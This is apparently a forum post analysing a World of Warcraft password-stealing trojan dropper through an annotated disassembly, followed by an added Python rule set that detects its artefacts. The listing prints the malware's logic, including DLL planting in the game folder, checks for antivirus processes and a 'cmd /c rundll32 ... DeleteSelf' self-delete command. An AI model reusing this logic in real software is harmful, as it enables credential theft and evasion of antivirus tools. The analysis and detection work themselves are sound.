伤域
Posted on 2011-2-18 16:46
This post was last edited by 伤域 on 2011-9-6 00:21
00402460 > 55 push ebp ; entry point
00402461 8BEC mov ebp,esp
00402463 B8 2C100000 mov eax,102C
00402468 E8 B3030000 call tuoke.00402820
0040246D 53 push ebx
0040246E 56 push esi
0040246F 57 push edi ; World of Warcraft launcher
00402470 68 B0414000 push tuoke.004041B0 ; ASCII "wow.exe"
00402475 E8 46EDFFFF call tuoke.004011C0
0040247A 8BF0 mov esi,eax
0040247C 83C4 04 add esp,4
0040247F 85F6 test esi,esi
00402481 76 0D jbe short tuoke.00402490
00402483 68 10270000 push 2710
00402488 FF15 54304000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
0040248E 85F6 test esi,esi
00402490 8B3D A8304000 mov edi,dword ptr ds:[<&kernel32.TerminatePro>; terminate process
00402496 8B1D A4304000 mov ebx,dword ptr ds:[<&kernel32.OpenProcess>>; open a new process
0040249C 74 1F je short tuoke.004024BD
0040249E 6A 00 push 0
004024A0 56 push esi
004024A1 6A 00 push 0
004024A3 6A 01 push 1
004024A5 FFD3 call ebx
004024A7 50 push eax
004024A8 FFD7 call edi
004024AA 68 B0414000 push tuoke.004041B0 ; ASCII "wow.exe"
004024AF E8 0CEDFFFF call tuoke.004011C0
004024B4 8BF0 mov esi,eax
004024B6 83C4 04 add esp,4
004024B9 85F6 test esi,esi
004024BB ^ 75 E1 jnz short tuoke.0040249E
004024BD 68 94414000 push tuoke.00404194 ; ASCII "BackgroundDownloader.exe"
004024C2 E8 F9ECFFFF call tuoke.004011C0 ; a background downloader, for game updates!
004024C7 83C4 04 add esp,4
004024CA 85C0 test eax,eax
004024CC 74 0C je short tuoke.004024DA
004024CE 6A 00 push 0
004024D0 50 push eax
004024D1 6A 00 push 0
004024D3 6A 01 push 1
004024D5 FFD3 call ebx
004024D7 50 push eax
004024D8 FFD7 call edi ; Sleep is called below
004024DA 8B1D 54304000 mov ebx,dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
004024E0 68 D0070000 push 7D0
004024E5 FFD3 call ebx
004024E7 B9 00010000 mov ecx,100
004024EC 33C0 xor eax,eax
004024EE 8DBD D4EFFFFF lea edi,dword ptr ss:[ebp-102C]
004024F4 F3:AB rep stos dword ptr es:[edi]
004024F6 B9 00010000 mov ecx,100
004024FB 8DBD D4F3FFFF lea edi,dword ptr ss:[ebp-C2C]
00402501 F3:AB rep stos dword ptr es:[edi]
00402503 B9 00010000 mov ecx,100
00402508 8DBD D4F7FFFF lea edi,dword ptr ss:[ebp-82C]
0040250E F3:AB rep stos dword ptr es:[edi]
00402510 B9 00010000 mov ecx,100
00402515 BF C0414000 mov edi,tuoke.004041C0
0040251A F3:AB rep stos dword ptr es:[edi]
0040251C 8D85 D4F7FFFF lea eax,dword ptr ss:[ebp-82C]
00402522 50 push eax ; below: the game's install path
00402523 68 88414000 push tuoke.00404188 ; ASCII "InstallPath"
00402528 68 54414000 push tuoke.00404154 ; ASCII "SOFTWARE\Blizzard Entertainment\World of Warcraft"
0040252D 68 02000080 push 80000002
00402532 E8 29EEFFFF call tuoke.00401360
00402537 83C4 10 add esp,10
0040253A 8D8D D4F7FFFF lea ecx,dword ptr ss:[ebp-82C]
00402540 51 push ecx
00402541 FF15 C0304000 call dword ptr ds:[<&kernel32.lstrlen>] ; kernel32.lstrlenA
00402547 8B35 3C304000 mov esi,dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
0040254D 85C0 test eax,eax
0040254F 7E 43 jle short tuoke.00402594
00402551 8B3D 40304000 mov edi,dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
00402557 8D95 D4F7FFFF lea edx,dword ptr ss:[ebp-82C]
0040255D 8D85 D4EFFFFF lea eax,dword ptr ss:[ebp-102C]
00402563 52 push edx
00402564 50 push eax
00402565 FFD7 call edi
00402567 8D8D D4EFFFFF lea ecx,dword ptr ss:[ebp-102C] ; this should be the trojan!
0040256D 68 00404000 push tuoke.00404000 ; ASCII "wfsjowfdsaw.dll"
00402572 51 push ecx
00402573 FFD6 call esi
00402575 8D95 D4F7FFFF lea edx,dword ptr ss:[ebp-82C]
0040257B 8D85 D4F3FFFF lea eax,dword ptr ss:[ebp-C2C]
00402581 52 push edx
00402582 50 push eax
00402583 FFD7 call edi
00402585 8D8D D4F3FFFF lea ecx,dword ptr ss:[ebp-C2C]
0040258B 51 push ecx
0040258C E8 5FF0FFFF call tuoke.004015F0
00402591 83C4 04 add esp,4 ; a dsound.dll is generated here
00402594 B9 00010000 mov ecx,100
00402599 33C0 xor eax,eax
0040259B 8DBD D4FBFFFF lea edi,dword ptr ss:[ebp-42C]
004025A1 68 B80B0000 push 0BB8
004025A6 F3:AB rep stos dword ptr es:[edi] ; call Sleep
004025A8 FFD3 call ebx
004025AA 8D95 D4FBFFFF lea edx,dword ptr ss:[ebp-42C]
004025B0 52 push edx
004025B1 68 04010000 push 104 ; get the temp directory path
004025B6 FF15 44304000 call dword ptr ds:[<&kernel32.GetTempPathA>] ; kernel32.GetTempPathA
004025BC FF15 68304000 call dword ptr ds:[<&kernel32.GetTickCount>] ; kernel32.GetTickCount
004025C2 68 C4454000 push tuoke.004045C4 ; get the milliseconds elapsed since system boot
004025C7 50 push eax
004025C8 E8 93EFFFFF call tuoke.00401560
004025CD 83C4 08 add esp,8 ; the trojan above gets renamed
004025D0 68 4C414000 push tuoke.0040414C ; ASCII "n02.dll"
004025D5 68 C4454000 push tuoke.004045C4 ; the elapsed millisecond count
004025DA FFD6 call esi
004025DC 8D85 D4FBFFFF lea eax,dword ptr ss:[ebp-42C] ; renamed to (milliseconds + n02).dll
004025E2 68 C4454000 push tuoke.004045C4 ; ASCII "10625375n02.dll"
004025E7 50 push eax
004025E8 FFD6 call esi
004025EA 8D8D D4FBFFFF lea ecx,dword ptr ss:[ebp-42C]
004025F0 51 push ecx
004025F1 6A 6E push 6E
004025F3 E8 18EAFFFF call tuoke.00401010
004025F8 83C4 08 add esp,8
004025FB 85C0 test eax,eax
004025FD 0F84 ED010000 je tuoke.004027F0
00402603 8D95 D4FBFFFF lea edx,dword ptr ss:[ebp-42C]
00402609 52 push edx
0040260A E8 E1EAFFFF call tuoke.004010F0
0040260F 83C4 04 add esp,4
00402612 68 44414000 push tuoke.00404144 ; ASCII "wow0831"
00402617 6A 00 push 0
00402619 68 01001F00 push 1F0001 ; create mutex object
0040261E FF15 A0304000 call dword ptr ds:[<&kernel32.OpenMutexA>] ; kernel32.OpenMutexA
00402624 85C0 test eax,eax
00402626 0F85 C4010000 jnz tuoke.004027F0 ; Kaspersky
0040262C 68 3C414000 push tuoke.0040413C ; ASCII "avp.exe"
00402631 E8 8AEBFFFF call tuoke.004011C0
00402636 83C4 04 add esp,4
00402639 85C0 test eax,eax
0040263B 0F85 84010000 jnz tuoke.004027C5 ; Rising
00402641 68 30414000 push tuoke.00404130 ; ASCII "RavMonD.exe"
00402646 E8 75EBFFFF call tuoke.004011C0
0040264B 83C4 04 add esp,4
0040264E 85C0 test eax,eax
00402650 0F85 6F010000 jnz tuoke.004027C5 ; 360 Antivirus real-time monitor
00402656 68 24414000 push tuoke.00404124 ; ASCII "360rp.exe"
0040265B E8 60EBFFFF call tuoke.004011C0
00402660 83C4 04 add esp,4
00402663 85C0 test eax,eax
00402665 0F85 5A010000 jnz tuoke.004027C5 ; 360 Antivirus main program
0040266B 68 18414000 push tuoke.00404118 ; ASCII "360sd.exe"
00402670 E8 4BEBFFFF call tuoke.004011C0
00402675 83C4 04 add esp,4
00402678 85C0 test eax,eax
0040267A 0F85 45010000 jnz tuoke.004027C5 ; 360 Safeguard real-time monitor
00402680 68 0C414000 push tuoke.0040410C ; ASCII "360tray.exe"
00402685 E8 36EBFFFF call tuoke.004011C0
0040268A 83C4 04 add esp,4
0040268D 85C0 test eax,eax
0040268F 0F85 30010000 jnz tuoke.004027C5 ; 360 Safeguard main process; if this is running, jump away..
00402695 68 00414000 push tuoke.00404100 ; ASCII "360safe.exe"
0040269A E8 21EBFFFF call tuoke.004011C0
0040269F 83C4 04 add esp,4
004026A2 85C0 test eax,eax
004026A4 0F85 1B010000 jnz tuoke.004027C5
004026AA 90 nop
004026AB 90 nop
004026AC 90 nop
004026AD 90 nop
004026AE 90 nop
004026AF 90 nop
004026B0 90 nop
004026B1 90 nop
004026B2 90 nop
004026B3 90 nop
004026B4 90 nop
004026B5 E8 26EDFFFF call tuoke.004013E0
004026BA 8B15 F4404000 mov edx,dword ptr ds:[4040F4]
004026C0 8B45 08 mov eax,dword ptr ss:[ebp+8]
004026C3 8B0D F0404000 mov ecx,dword ptr ds:[4040F0]
004026C9 8955 F4 mov dword ptr ss:[ebp-C],edx
004026CC 8D55 F0 lea edx,dword ptr ss:[ebp-10]
004026CF A3 C0454000 mov dword ptr ds:[4045C0],eax
004026D4 A1 F8404000 mov eax,dword ptr ds:[4040F8]
004026D9 52 push edx
004026DA 6A 04 push 4
004026DC 6A 00 push 0
004026DE 894D F0 mov dword ptr ss:[ebp-10],ecx
004026E1 8A0D FC404000 mov cl,byte ptr ds:[4040FC]
004026E7 6A 04 push 4
004026E9 6A 00 push 0
004026EB 6A FF push -1
004026ED 8945 F8 mov dword ptr ss:[ebp-8],eax
004026F0 884D FC mov byte ptr ss:[ebp-4],cl ; if execution gets here, create a file-mapping kernel object
004026F3 FF15 9C304000 call dword ptr ds:[<&kernel32.CreateFileMappi>; kernel32.CreateFileMappingA
004026F9 6A 04 push 4
004026FB 6A 00 push 0
004026FD 8BD8 mov ebx,eax
004026FF 6A 00 push 0
00402701 68 1F000F00 push 0F001F
00402706 53 push ebx ; map the object above into the program's address space
00402707 FF15 98304000 call dword ptr ds:[<&kernel32.MapViewOfFile>] ; kernel32.MapViewOfFile
0040270D 8BF0 mov esi,eax
0040270F 8975 08 mov dword ptr ss:[ebp+8],esi ; get the current thread ID
00402712 FF15 94304000 call dword ptr ds:[<&kernel32.GetCurrentThrea>; kernel32.GetCurrentThreadId
00402718 8906 mov dword ptr ds:[esi],eax
0040271A 8D85 D4FBFFFF lea eax,dword ptr ss:[ebp-42C]
00402720 50 push eax ; load the DLL and map it into the current process
00402721 FF15 90304000 call dword ptr ds:[<&kernel32.LoadLibraryA>] ; kernel32.LoadLibraryA
00402727 8BF0 mov esi,eax
00402729 85F6 test esi,esi
0040272B 0F84 C4000000 je tuoke.004027F5 ; look up the exported function addresses in the DLL
00402731 8B3D 8C304000 mov edi,dword ptr ds:[<&kernel32.GetProcAddre>; kernel32.GetProcAddress
00402737 68 E8404000 push tuoke.004040E8 ; ASCII "HHHH"
0040273C 56 push esi ; account, presumably..
0040273D FFD7 call edi
0040273F 68 E0404000 push tuoke.004040E0 ; ASCII "UUUU"
00402744 56 push esi ; password, presumably..
00402745 A3 C8464000 mov dword ptr ds:[4046C8],eax
0040274A FFD7 call edi
0040274C A3 CC464000 mov dword ptr ds:[4046CC],eax
00402751 FF15 C8464000 call dword ptr ds:[4046C8]
00402757 6A 00 push 0
00402759 6A 00 push 0
0040275B 6A 07 push 7
0040275D 68 FFFF0000 push 0FFFF ; probably sends the account and password to the trojan author!
00402762 FF15 EC304000 call dword ptr ds:[<&USER32.PostMessageA>] ; USER32.PostMessageA
00402768 83EC 1C sub esp,1C
0040276B B9 07000000 mov ecx,7
00402770 8D75 D4 lea esi,dword ptr ss:[ebp-2C]
00402773 8BFC mov edi,esp
00402775 F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[esi>
00402777 E8 44ECFFFF call tuoke.004013C0
0040277C 83C4 1C add esp,1C
0040277F 85C0 test eax,eax
00402781 74 1B je short tuoke.0040279E
00402783 83EC 1C sub esp,1C
00402786 B9 07000000 mov ecx,7
0040278B 8D75 D4 lea esi,dword ptr ss:[ebp-2C]
0040278E 8BFC mov edi,esp
00402790 F3:A5 rep movs dword ptr es:[edi],dword ptr ds:[esi>
00402792 E8 29ECFFFF call tuoke.004013C0
00402797 83C4 1C add esp,1C
0040279A 85C0 test eax,eax
0040279C ^ 75 E5 jnz short tuoke.00402783
0040279E 8B4D 08 mov ecx,dword ptr ss:[ebp+8]
004027A1 51 push ecx ; unmap the view mapped above
004027A2 FF15 88304000 call dword ptr ds:[<&kernel32.UnmapViewOfFile>; kernel32.UnmapViewOfFile
004027A8 FF15 CC464000 call dword ptr ds:[4046CC]
004027AE 53 push ebx ; close the object
004027AF FF15 BC304000 call dword ptr ds:[<&kernel32.CloseHandle>] ; kernel32.CloseHandle
004027B5 E8 96EAFFFF call tuoke.00401250
004027BA 33C0 xor eax,eax
004027BC 5F pop edi
004027BD 5E pop esi
004027BE 5B pop ebx
004027BF 8BE5 mov esp,ebp
004027C1 5D pop ebp
004027C2 C2 1000 retn 10
The jumps above land here..
004027C5 8D95 D4F7FFFF lea edx,dword ptr ss:[ebp-82C]
004027CB 52 push edx
004027CC FF15 C0304000 call dword ptr ds:[<&kernel32.lstrlen>] ; kernel32.lstrlenA
004027D2 85C0 test eax,eax
004027D4 75 1A jnz short tuoke.004027F0
004027D6 E8 65FBFFFF call tuoke.00402340
004027DB A1 3C474000 mov eax,dword ptr ds:[40473C]
004027E0 6A FF push -1
004027E2 6A 01 push 1
004027E4 68 D4464000 push tuoke.004046D4
004027E9 50 push eax
004027EA FF15 84304000 call dword ptr ds:[<&kernel32.WaitForMultiple>; kernel32.WaitForMultipleObjects
004027F0 E8 5BEAFFFF call tuoke.00401250 ; step into this call..
Inside the call above..
00401250 81EC 10040000 sub esp,410
00401256 53 push ebx
00401257 56 push esi
00401258 57 push edi
00401259 33DB xor ebx,ebx
0040125B B9 40000000 mov ecx,40
00401260 33C0 xor eax,eax
00401262 8DBC24 15020000 lea edi,dword ptr ss:[esp+215]
00401269 889C24 14020000 mov byte ptr ss:[esp+214],bl
00401270 F3:AB rep stos dword ptr es:[edi]
00401272 66:AB stos word ptr es:[edi]
00401274 AA stos byte ptr es:[edi]
00401275 8D8424 14020000 lea eax,dword ptr ss:[esp+214]
0040127C 68 04010000 push 104
00401281 50 push eax
00401282 53 push ebx ; get the game's full path
00401283 FF15 28304000 call dword ptr ds:[<&kernel32.GetModuleFileNa>; kernel32.GetModuleFileNameA
00401289 B9 40000000 mov ecx,40
0040128E 33C0 xor eax,eax
00401290 8DBC24 11010000 lea edi,dword ptr ss:[esp+111]
00401297 889C24 10010000 mov byte ptr ss:[esp+110],bl
0040129E F3:AB rep stos dword ptr es:[edi]
004012A0 66:AB stos word ptr es:[edi]
004012A2 8D8C24 10010000 lea ecx,dword ptr ss:[esp+110]
004012A9 51 push ecx
004012AA 68 04010000 push 104
004012AF AA stos byte ptr es:[edi] ; get the temp directory path
004012B0 FF15 44304000 call dword ptr ds:[<&kernel32.GetTempPathA>] ; kernel32.GetTempPathA
004012B6 8B35 3C304000 mov esi,dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
004012BC 8D9424 10010000 lea edx,dword ptr ss:[esp+110] ; the trojan..
004012C3 68 C4454000 push tuoke.004045C4 ; ASCII "10838671n02.dll"
004012C8 52 push edx
004012C9 FFD6 call esi
004012CB B9 40000000 mov ecx,40
004012D0 33C0 xor eax,eax
004012D2 8D7C24 0D lea edi,dword ptr ss:[esp+D]
004012D6 885C24 0C mov byte ptr ss:[esp+C],bl
004012DA F3:AB rep stos dword ptr es:[edi]
004012DC 66:AB stos word ptr es:[edi]
004012DE AA stos byte ptr es:[edi]
004012DF 8D4424 0C lea eax,dword ptr ss:[esp+C]
004012E3 68 04010000 push 104
004012E8 50 push eax ; get the full system directory path
004012E9 FF15 50304000 call dword ptr ds:[<&kernel32.GetSystemDirect>; kernel32.GetSystemDirectoryA
004012EF 8D4C24 0C lea ecx,dword ptr ss:[esp+C]
004012F3 68 50404000 push tuoke.00404050 ; ASCII "\rundll32.exe"
004012F8 51 push ecx ; before running this it should load the trojan above
004012F9 FFD6 call esi
004012FB B9 40000000 mov ecx,40
00401300 33C0 xor eax,eax
00401302 8DBC24 19030000 lea edi,dword ptr ss:[esp+319]
00401309 889C24 18030000 mov byte ptr ss:[esp+318],bl
00401310 F3:AB rep stos dword ptr es:[edi]
00401312 66:AB stos word ptr es:[edi]
00401314 8D9424 14020000 lea edx,dword ptr ss:[esp+214]
0040131B 8D4C24 0C lea ecx,dword ptr ss:[esp+C]
0040131F AA stos byte ptr es:[edi]
00401320 52 push edx
00401321 8D8424 14010000 lea eax,dword ptr ss:[esp+114] ; delete self
00401328 68 44404000 push tuoke.00404044 ; ASCII "DeleteSelf"
0040132D 50 push eax
0040132E 51 push ecx
0040132F 8D9424 28030000 lea edx,dword ptr ss:[esp+328]
00401336 68 30404000 push tuoke.00404030 ; ASCII "cmd /c %s %s,%s %s"
0040133B 52 push edx
0040133C FF15 F0304000 call dword ptr ds:[<&USER32.wsprintfA>] ; USER32.wsprintfA
00401342 83C4 18 add esp,18
00401345 8D8424 18030000 lea eax,dword ptr ss:[esp+318]
0040134C 53 push ebx
0040134D 50 push eax
0040134E FF15 4C304000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
00401354 53 push ebx ; exit the process below, and that's the end.
00401355 FF15 48304000 call dword ptr ds:[<&kernel32.ExitProcess>] ; kernel32.ExitProcess
Summary: this is a typical DLL-injection trojan. The DLL is loaded alongside the game while it runs, in order to capture the account and password.
Latest video download link: http://u.115.com/file/agxfevz0#
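As an added example (not part of the original post or the sample's code), here is a small Python detector that turns the three file/process artefacts visible in the listing into rules and runs them over constructed Sysmon-style event lines: the DLL dropped into the game's InstallPath, the "<GetTickCount>n02.dll" copy in %TEMP%, and the "cmd /c rundll32.exe <dll>,DeleteSelf" self-delete. The install path, log format and all sample paths are assumptions made up for this example.

```python
import re

# Constructed install path; in practice read it from the same registry value the
# dropper reads (HKLM\SOFTWARE\Blizzard Entertainment\World of Warcraft, InstallPath).
WOW_INSTALL_PATH = r"C:\Program Files\World of Warcraft"

def build_rules(install_path):
    """Regexes for the three artefacts the listing shows the dropper leaving behind."""
    base = re.escape(install_path.rstrip("\\"))
    return {
        # dsound.dll (or the wfsjowfdsaw.dll it is built from) written into the game dir
        "planted_dll_in_game_dir": re.compile(
            r"TargetFilename=" + base + r"\\(dsound|wfsjowfdsaw)\.dll$", re.I),
        # payload copied to %TEMP% as "<GetTickCount>n02.dll"
        "temp_n02_dll": re.compile(r"TargetFilename=.*\\Temp\\\d+n02\.dll$", re.I),
        # self-delete: cmd /c <system32>\rundll32.exe <temp dll>,DeleteSelf <own exe>
        "rundll32_deleteself": re.compile(
            r"CommandLine=cmd /c .*\\rundll32\.exe .*\\\d+n02\.dll,DeleteSelf ", re.I),
    }

def classify(line, install_path=WOW_INSTALL_PATH):
    """Name of the first rule matching one event line, or None."""
    for name, rx in build_rules(install_path).items():
        if rx.search(line):
            return name
    return None

def scan(lines, install_path=WOW_INSTALL_PATH):
    """Return (rule, line) pairs for every matching line, in input order."""
    hits = []
    for line in lines:
        name = classify(line, install_path)
        if name:
            hits.append((name, line.strip()))
    return hits

def is_dropper_activity(lines, install_path=WOW_INSTALL_PATH):
    """Two or more distinct artefacts from the same chain is a strong signal."""
    return len({rule for rule, _ in scan(lines, install_path)}) >= 2

# Constructed Sysmon-style events ("Type key=value ..."); paths and the tick-count
# prefix are made-up sample values, not indicators taken from a real host.
SAMPLE_EVENTS = [
    r"ProcessCreate Image=C:\Games\tuoke.exe CommandLine=tuoke.exe",
    r"FileCreate Image=C:\Games\tuoke.exe TargetFilename=C:\Program Files\World of Warcraft\dsound.dll",
    r"FileCreate Image=C:\Games\tuoke.exe TargetFilename=C:\Users\u\AppData\Local\Temp\10625375n02.dll",
    r"ProcessCreate Image=C:\Windows\System32\cmd.exe CommandLine=cmd /c "
    r"C:\Windows\system32\rundll32.exe C:\Users\u\AppData\Local\Temp\10625375n02.dll,DeleteSelf C:\Games\tuoke.exe",
    r"FileCreate Image=C:\Windows\explorer.exe TargetFilename=C:\Users\u\Desktop\notes.txt",
]
```

Running `scan(SAMPLE_EVENTS)` flags the three dropper lines and leaves the benign ones alone; `is_dropper_activity` then reports the chain as a whole.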